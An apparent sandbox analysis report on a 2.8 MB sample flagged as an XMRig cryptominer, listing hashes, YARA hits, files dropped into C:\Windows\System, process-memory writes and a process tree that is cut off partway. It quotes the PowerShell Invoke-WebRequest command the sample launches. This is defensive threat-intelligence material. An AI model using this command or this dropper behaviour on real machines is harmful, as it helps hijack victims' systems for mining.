xmrig | bfab052155b84beb78f55b896d3c515a431084e1eaadba7327c1565e9420f263

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
10/05/2024, 05:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
Size

2.8MB
MD5

7f4ae074d3e42d461e591c1318d95e40
SHA1

63feb184873d2de02adeb993533f4d7eeaf1e436
SHA256

bfab052155b84beb78f55b896d3c515a431084e1eaadba7327c1565e9420f263
SHA512

c03d2c9b43da3d0b73e2a3cca744c2d27558f32adb6917b9628408388615307bf247f738456254d24fd22106cca39960ed2eeae2f7dd1566969887aa65640c5a
SSDEEP

49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0IlnASEx/wfG:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2RC

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/4152-0-0x00007FF77C370000-0x00007FF77C766000-memory.dmp	xmrig
behavioral2/memory/2144-13-0x00007FF681490000-0x00007FF681886000-memory.dmp	xmrig
behavioral2/files/0x0007000000023421-14.dat	xmrig
behavioral2/files/0x000800000002341d-7.dat	xmrig
behavioral2/files/0x0007000000023422-10.dat	xmrig
behavioral2/files/0x0007000000023423-21.dat	xmrig
behavioral2/files/0x0007000000023425-34.dat	xmrig
behavioral2/files/0x0007000000023424-42.dat	xmrig
behavioral2/files/0x000700000002342a-55.dat	xmrig
behavioral2/memory/3944-60-0x00007FF7156E0000-0x00007FF715AD6000-memory.dmp	xmrig
behavioral2/memory/2828-61-0x00007FF6639D0000-0x00007FF663DC6000-memory.dmp	xmrig
behavioral2/memory/1424-82-0x00007FF670C10000-0x00007FF671006000-memory.dmp	xmrig
behavioral2/files/0x000700000002342e-87.dat	xmrig
behavioral2/memory/3624-89-0x00007FF73BF20000-0x00007FF73C316000-memory.dmp	xmrig
behavioral2/memory/2932-91-0x00007FF68D9B0000-0x00007FF68DDA6000-memory.dmp	xmrig
behavioral2/memory/1176-93-0x00007FF77BEA0000-0x00007FF77C296000-memory.dmp	xmrig
behavioral2/memory/3980-92-0x00007FF662F30000-0x00007FF663326000-memory.dmp	xmrig
behavioral2/files/0x000700000002342b-85.dat	xmrig
behavioral2/memory/3292-84-0x00007FF745400000-0x00007FF7457F6000-memory.dmp	xmrig
behavioral2/memory/4912-83-0x00007FF63EF00000-0x00007FF63F2F6000-memory.dmp	xmrig
behavioral2/memory/3952-79-0x00007FF679600000-0x00007FF6799F6000-memory.dmp	xmrig
behavioral2/memory/3472-64-0x00007FF72FB10000-0x00007FF72FF06000-memory.dmp	xmrig
behavioral2/files/0x0007000000023429-62.dat	xmrig
behavioral2/memory/1320-56-0x00007FF718C40000-0x00007FF719036000-memory.dmp	xmrig
behavioral2/files/0x0007000000023428-52.dat	xmrig
behavioral2/files/0x0007000000023427-48.dat	xmrig
behavioral2/files/0x0007000000023426-44.dat	xmrig
behavioral2/files/0x000800000002342d-105.dat	xmrig
behavioral2/memory/2360-106-0x00007FF743C60000-0x00007FF744056000-memory.dmp	xmrig
behavioral2/memory/1556-114-0x00007FF6FD3B0000-0x00007FF6FD7A6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023431-122.dat	xmrig
behavioral2/files/0x0007000000023434-132.dat	xmrig
behavioral2/files/0x0007000000023433-141.dat	xmrig
behavioral2/memory/2004-147-0x00007FF6EB900000-0x00007FF6EBCF6000-memory.dmp	xmrig
behavioral2/memory/4140-148-0x00007FF69ADE0000-0x00007FF69B1D6000-memory.dmp	xmrig
behavioral2/memory/1552-150-0x00007FF65C760000-0x00007FF65CB56000-memory.dmp	xmrig
behavioral2/files/0x0007000000023436-154.dat	xmrig
behavioral2/memory/1344-151-0x00007FF76E750000-0x00007FF76EB46000-memory.dmp	xmrig
behavioral2/memory/2204-149-0x00007FF6D1A70000-0x00007FF6D1E66000-memory.dmp	xmrig
behavioral2/files/0x0007000000023435-146.dat	xmrig
behavioral2/memory/2864-144-0x00007FF799590000-0x00007FF799986000-memory.dmp	xmrig
behavioral2/files/0x0007000000023432-137.dat	xmrig
behavioral2/memory/896-136-0x00007FF7E4DA0000-0x00007FF7E5196000-memory.dmp	xmrig
behavioral2/memory/4476-129-0x00007FF7BD020000-0x00007FF7BD416000-memory.dmp	xmrig
behavioral2/files/0x0007000000023430-130.dat	xmrig
behavioral2/files/0x000800000002341e-116.dat	xmrig
behavioral2/files/0x000700000002342f-118.dat	xmrig
behavioral2/files/0x0007000000023437-158.dat	xmrig
behavioral2/files/0x0007000000023438-167.dat	xmrig
behavioral2/files/0x000700000002343c-185.dat	xmrig
behavioral2/files/0x000700000002343b-183.dat	xmrig
behavioral2/files/0x000700000002343a-181.dat	xmrig
behavioral2/files/0x0007000000023439-169.dat	xmrig
behavioral2/memory/2892-165-0x00007FF762900000-0x00007FF762CF6000-memory.dmp	xmrig
behavioral2/files/0x000700000002344f-255.dat	xmrig
behavioral2/files/0x000700000002344a-246.dat	xmrig
behavioral2/files/0x000700000002343d-229.dat	xmrig
behavioral2/memory/4152-1658-0x00007FF77C370000-0x00007FF77C766000-memory.dmp	xmrig
behavioral2/memory/3624-1996-0x00007FF73BF20000-0x00007FF73C316000-memory.dmp	xmrig
behavioral2/memory/2144-1661-0x00007FF681490000-0x00007FF681886000-memory.dmp	xmrig
behavioral2/memory/2360-2197-0x00007FF743C60000-0x00007FF744056000-memory.dmp	xmrig
behavioral2/memory/1556-2198-0x00007FF6FD3B0000-0x00007FF6FD7A6000-memory.dmp	xmrig
behavioral2/memory/2864-2199-0x00007FF799590000-0x00007FF799986000-memory.dmp	xmrig
behavioral2/memory/4140-2200-0x00007FF69ADE0000-0x00007FF69B1D6000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

flow	pid	Process
7	860	powershell.exe
9	860	powershell.exe
15	860	powershell.exe
16	860	powershell.exe
20	860	powershell.exe
27	860	powershell.exe
28	860	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
860	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2144	HbmkPfp.exe
2932	QQsaMeC.exe
1320	XuhtTPv.exe
3944	XSfGhwe.exe
2828	LSTLLaC.exe
3472	QkEeoTT.exe
3952	dZUlUEe.exe
1424	xondCSw.exe
4912	mIQKnew.exe
3980	SecVUgT.exe
3292	FOTDofy.exe
1176	xoBHovG.exe
3624	DyaLutD.exe
2360	QkiaTpq.exe
4476	obhtHYv.exe
1556	ghDdXfk.exe
896	HdJBgBo.exe
2204	pzOiuOf.exe
2864	UrxlAAO.exe
2004	GOOkynJ.exe
1552	qSphdAv.exe
4140	sXBPMvF.exe
1344	PlUgdFU.exe
2892	BVTsULb.exe
3820	jpNyvrx.exe
3092	BlnxPqO.exe
2188	BMJsSfd.exe
4380	UQwhebS.exe
3508	BXLXdIJ.exe
2860	pthXGLz.exe
1748	ARwElTn.exe
4844	cLIQvQW.exe
4024	RGLrBBT.exe
3840	UOOAuVx.exe
4600	PGduiUv.exe
700	xesnnza.exe
3244	XLxamgg.exe
1016	YVVoTQB.exe
2372	KUOIgOv.exe
1316	wTiOONb.exe
4212	TejqWML.exe
1192	PobGJVT.exe
3784	rhbfUyq.exe
1044	DnguoFi.exe
2944	tcYIePy.exe
4092	ArIMAZd.exe
4472	DvQvZID.exe
2452	pPrmhsU.exe
4304	nQLfSNo.exe
3644	AAqVrXP.exe
3492	uaEhgkN.exe
1936	mludFFQ.exe
1032	zByGXlc.exe
4292	kZYrbiM.exe
744	UiKDLix.exe
4184	mmvrZZs.exe
3280	qaWMlqm.exe
1828	qodLBuo.exe
1848	yHXJZrP.exe
3652	UeZuiFw.exe
1140	vLDaXpG.exe
332	cOTARmX.exe
4220	YOURaRs.exe
3896	eTTjgUy.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4152-0-0x00007FF77C370000-0x00007FF77C766000-memory.dmp	upx
behavioral2/memory/2144-13-0x00007FF681490000-0x00007FF681886000-memory.dmp	upx
behavioral2/files/0x0007000000023421-14.dat	upx
behavioral2/files/0x000800000002341d-7.dat	upx
behavioral2/files/0x0007000000023422-10.dat	upx
behavioral2/files/0x0007000000023423-21.dat	upx
behavioral2/files/0x0007000000023425-34.dat	upx
behavioral2/files/0x0007000000023424-42.dat	upx
behavioral2/files/0x000700000002342a-55.dat	upx
behavioral2/memory/3944-60-0x00007FF7156E0000-0x00007FF715AD6000-memory.dmp	upx
behavioral2/memory/2828-61-0x00007FF6639D0000-0x00007FF663DC6000-memory.dmp	upx
behavioral2/memory/1424-82-0x00007FF670C10000-0x00007FF671006000-memory.dmp	upx
behavioral2/files/0x000700000002342e-87.dat	upx
behavioral2/memory/3624-89-0x00007FF73BF20000-0x00007FF73C316000-memory.dmp	upx
behavioral2/memory/2932-91-0x00007FF68D9B0000-0x00007FF68DDA6000-memory.dmp	upx
behavioral2/memory/1176-93-0x00007FF77BEA0000-0x00007FF77C296000-memory.dmp	upx
behavioral2/memory/3980-92-0x00007FF662F30000-0x00007FF663326000-memory.dmp	upx
behavioral2/files/0x000700000002342b-85.dat	upx
behavioral2/memory/3292-84-0x00007FF745400000-0x00007FF7457F6000-memory.dmp	upx
behavioral2/memory/4912-83-0x00007FF63EF00000-0x00007FF63F2F6000-memory.dmp	upx
behavioral2/memory/3952-79-0x00007FF679600000-0x00007FF6799F6000-memory.dmp	upx
behavioral2/memory/3472-64-0x00007FF72FB10000-0x00007FF72FF06000-memory.dmp	upx
behavioral2/files/0x0007000000023429-62.dat	upx
behavioral2/memory/1320-56-0x00007FF718C40000-0x00007FF719036000-memory.dmp	upx
behavioral2/files/0x0007000000023428-52.dat	upx
behavioral2/files/0x0007000000023427-48.dat	upx
behavioral2/files/0x0007000000023426-44.dat	upx
behavioral2/files/0x000800000002342d-105.dat	upx
behavioral2/memory/2360-106-0x00007FF743C60000-0x00007FF744056000-memory.dmp	upx
behavioral2/memory/1556-114-0x00007FF6FD3B0000-0x00007FF6FD7A6000-memory.dmp	upx
behavioral2/files/0x0007000000023431-122.dat	upx
behavioral2/files/0x0007000000023434-132.dat	upx
behavioral2/files/0x0007000000023433-141.dat	upx
behavioral2/memory/2004-147-0x00007FF6EB900000-0x00007FF6EBCF6000-memory.dmp	upx
behavioral2/memory/4140-148-0x00007FF69ADE0000-0x00007FF69B1D6000-memory.dmp	upx
behavioral2/memory/1552-150-0x00007FF65C760000-0x00007FF65CB56000-memory.dmp	upx
behavioral2/files/0x0007000000023436-154.dat	upx
behavioral2/memory/1344-151-0x00007FF76E750000-0x00007FF76EB46000-memory.dmp	upx
behavioral2/memory/2204-149-0x00007FF6D1A70000-0x00007FF6D1E66000-memory.dmp	upx
behavioral2/files/0x0007000000023435-146.dat	upx
behavioral2/memory/2864-144-0x00007FF799590000-0x00007FF799986000-memory.dmp	upx
behavioral2/files/0x0007000000023432-137.dat	upx
behavioral2/memory/896-136-0x00007FF7E4DA0000-0x00007FF7E5196000-memory.dmp	upx
behavioral2/memory/4476-129-0x00007FF7BD020000-0x00007FF7BD416000-memory.dmp	upx
behavioral2/files/0x0007000000023430-130.dat	upx
behavioral2/files/0x000800000002341e-116.dat	upx
behavioral2/files/0x000700000002342f-118.dat	upx
behavioral2/files/0x0007000000023437-158.dat	upx
behavioral2/files/0x0007000000023438-167.dat	upx
behavioral2/files/0x000700000002343c-185.dat	upx
behavioral2/files/0x000700000002343b-183.dat	upx
behavioral2/files/0x000700000002343a-181.dat	upx
behavioral2/files/0x0007000000023439-169.dat	upx
behavioral2/memory/2892-165-0x00007FF762900000-0x00007FF762CF6000-memory.dmp	upx
behavioral2/files/0x000700000002344f-255.dat	upx
behavioral2/files/0x000700000002344a-246.dat	upx
behavioral2/files/0x000700000002343d-229.dat	upx
behavioral2/memory/4152-1658-0x00007FF77C370000-0x00007FF77C766000-memory.dmp	upx
behavioral2/memory/3624-1996-0x00007FF73BF20000-0x00007FF73C316000-memory.dmp	upx
behavioral2/memory/2144-1661-0x00007FF681490000-0x00007FF681886000-memory.dmp	upx
behavioral2/memory/2360-2197-0x00007FF743C60000-0x00007FF744056000-memory.dmp	upx
behavioral2/memory/1556-2198-0x00007FF6FD3B0000-0x00007FF6FD7A6000-memory.dmp	upx
behavioral2/memory/2864-2199-0x00007FF799590000-0x00007FF799986000-memory.dmp	upx
behavioral2/memory/4140-2200-0x00007FF69ADE0000-0x00007FF69B1D6000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\XGyCDVb.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\hfKVYvJ.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\VNCZdoN.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\VJbAsXL.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\OPiIbaz.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\QQPSaBF.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\StDEndA.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\UQwUilI.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\hWSYibq.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\vJXzXJg.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\BlnxPqO.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\OoARitY.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\fKmDqAq.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\AwHorKV.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\JXyRWVN.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\SmvTOfK.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\CRJOGaM.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\uHQDMcK.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\SJHpIxL.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\TAfpOsX.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\aJdJdqV.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\CuFvppe.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\bujMqyC.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\ZNbeiLz.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\ojdRhEB.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\tUptwKJ.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\jwrRaNz.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\cDYsyao.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\PYsTZzt.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\qaWMlqm.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\HBVrAvE.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\qSphdAv.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\kZYrbiM.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\zBtrzvC.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\SzmzcpP.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\PQRJkfX.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\bHkGvqT.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\JPKqWUG.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\IBUJZFd.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\pthXGLz.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\yEAOAbV.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\pFwOnah.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\OZEngqX.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\bdPrilj.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\XgOMdmq.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\bFnFBbI.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\kKoSgrp.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\cquyRdj.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\wIerXzl.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\NoWlIVG.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\KDqhByG.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\YdSrnIJ.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\QMaxZnE.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\XydzQim.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\yRtmmuZ.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\pGKGmdS.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\BcKVXzG.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\ElrgOjp.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\vMlLvfl.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\jdlbcjL.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\vHlYSle.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\QfezKDS.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\bjoKHOA.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
File created	C:\Windows\System\FiHlUap.exe	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
860	powershell.exe
860	powershell.exe
860	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	860	powershell.exe
Token: SeLockMemoryPrivilege	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4152 wrote to memory of 860	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	84
PID 4152 wrote to memory of 860	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	84
PID 4152 wrote to memory of 2144	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	85
PID 4152 wrote to memory of 2144	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	85
PID 4152 wrote to memory of 2932	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	87
PID 4152 wrote to memory of 2932	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	87
PID 4152 wrote to memory of 1320	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	88
PID 4152 wrote to memory of 1320	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	88
PID 4152 wrote to memory of 3944	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	89
PID 4152 wrote to memory of 3944	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	89
PID 4152 wrote to memory of 2828	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	90
PID 4152 wrote to memory of 2828	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	90
PID 4152 wrote to memory of 3472	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	91
PID 4152 wrote to memory of 3472	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	91
PID 4152 wrote to memory of 3952	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	92
PID 4152 wrote to memory of 3952	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	92
PID 4152 wrote to memory of 1424	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	93
PID 4152 wrote to memory of 1424	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	93
PID 4152 wrote to memory of 4912	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	94
PID 4152 wrote to memory of 4912	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	94
PID 4152 wrote to memory of 3980	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	95
PID 4152 wrote to memory of 3980	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	95
PID 4152 wrote to memory of 3292	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	96
PID 4152 wrote to memory of 3292	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	96
PID 4152 wrote to memory of 1176	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	97
PID 4152 wrote to memory of 1176	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	97
PID 4152 wrote to memory of 3624	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	98
PID 4152 wrote to memory of 3624	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	98
PID 4152 wrote to memory of 2360	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	100
PID 4152 wrote to memory of 2360	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	100
PID 4152 wrote to memory of 4476	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	101
PID 4152 wrote to memory of 4476	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	101
PID 4152 wrote to memory of 1556	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	102
PID 4152 wrote to memory of 1556	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	102
PID 4152 wrote to memory of 896	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	103
PID 4152 wrote to memory of 896	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	103
PID 4152 wrote to memory of 2864	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	104
PID 4152 wrote to memory of 2864	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	104
PID 4152 wrote to memory of 2204	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	105
PID 4152 wrote to memory of 2204	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	105
PID 4152 wrote to memory of 2004	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	106
PID 4152 wrote to memory of 2004	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	106
PID 4152 wrote to memory of 1552	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	107
PID 4152 wrote to memory of 1552	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	107
PID 4152 wrote to memory of 4140	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	108
PID 4152 wrote to memory of 4140	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	108
PID 4152 wrote to memory of 1344	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	109
PID 4152 wrote to memory of 1344	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	109
PID 4152 wrote to memory of 2892	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	110
PID 4152 wrote to memory of 2892	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	110
PID 4152 wrote to memory of 3820	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	111
PID 4152 wrote to memory of 3820	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	111
PID 4152 wrote to memory of 3092	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	112
PID 4152 wrote to memory of 3092	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	112
PID 4152 wrote to memory of 2188	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	113
PID 4152 wrote to memory of 2188	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	113
PID 4152 wrote to memory of 4380	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	114
PID 4152 wrote to memory of 4380	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	114
PID 4152 wrote to memory of 3508	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	115
PID 4152 wrote to memory of 3508	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	115
PID 4152 wrote to memory of 2860	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	116
PID 4152 wrote to memory of 2860	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	116
PID 4152 wrote to memory of 1748	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	117
PID 4152 wrote to memory of 1748	4152	7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe	117

C:\Users\Admin\AppData\Local\Temp\7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\7f4ae074d3e42d461e591c1318d95e40_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:860
- C:\Windows\System\HbmkPfp.exe
  C:\Windows\System\HbmkPfp.exe
  2⤵
  - Executes dropped EXE
  PID:2144
- C:\Windows\System\QQsaMeC.exe
  C:\Windows\System\QQsaMeC.exe
  2⤵
  - Executes dropped EXE
  PID:2932
- C:\Windows\System\XuhtTPv.exe
  C:\Windows\System\XuhtTPv.exe
  2⤵
  - Executes dropped EXE
  PID:1320
- C:\Windows\System\XSfGhwe.exe
  C:\Windows\System\XSfGhwe.exe
  2⤵
  - Executes dropped EXE
  PID:3944
- C:\Windows\System\LSTLLaC.exe
  C:\Windows\System\LSTLLaC.exe
  2⤵
  - Executes dropped EXE
  PID:2828
- C:\Windows\System\QkEeoTT.exe
  C:\Windows\System\QkEeoTT.exe
  2⤵
  - Executes dropped EXE
  PID:3472
- C:\Windows\System\dZUlUEe.exe
  C:\Windows\System\dZUlUEe.exe
  2⤵
